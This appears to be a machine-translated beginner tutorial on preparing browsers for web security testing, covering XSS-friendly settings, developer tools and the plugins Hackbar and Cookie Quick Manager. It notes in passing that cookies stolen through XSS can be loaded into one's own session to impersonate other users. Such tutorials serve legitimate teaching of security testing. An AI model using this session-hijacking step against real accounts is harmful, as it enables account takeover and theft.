Introduction to safety testing
Different browsers have different security features, which can cause a vulnerability to trigger different effects on different browsers. This is a compatibility problem in different browsers.
Chrome + Firefox + IE combination
Change the default security test of the browser according to the test needs
How to modify security settings, normal operation
This is mainly to allow the operation of JavaScript and allow pop-up windows. During the xss test, if the pop-up window is not open, the xss script may be intercepted
Common functions for safety testing
- Clear the cache:
Many web browsers have the function of remembering passwords, which leads to users not having to enter the password every time they visit, but for the development and testing of the login interface, this is troublesome because browsing The device records the cache information of the user's login, and the access is successful with one click, so sometimes the cache information affects the test.
Clear browsing history.
Incognito mode (incognito window): This will not record cache information and operation traces, browsing history and cookie information. - View webpage source code
Right mouse button-> view webpage source code, or enter veiw-source in URL: URL - Developer tools: shortcut key F12
- Locate the DOM element:
F12-> Click the small arrow box on the left side of the developer toolbar-> select an area on the page
For example: a hacker clearance game www.hackthissite.org
login: account, password
Browser plugin acquisition
Introduction of commonly used plug-ins:
-
Hackbar:
Provides the function of quickly constructing HTTP requests and various encoding conversions.
However, this Hackbar is expensive after version 2.1.3. If you have resources, you can download version 2.1.3 to use it. I recommend Max here Hackbar (free), the functional interface is almost the same. -
Cookie Quick Manager:
Provides the browser with the ability to quickly modify, add, and delete cookies. The
xss vulnerability can obtain other user credential information in the cookie. Here, the obtained user credential information can be added to the current session through the editing function of the cookie manager.
Tips:
Through the two plug-ins Hackbar and Cookie Quick Manager, we can construct and forge most of the common requests. -
Proxy SwitchyOmega:
used to set proxy, combined with packet capture tool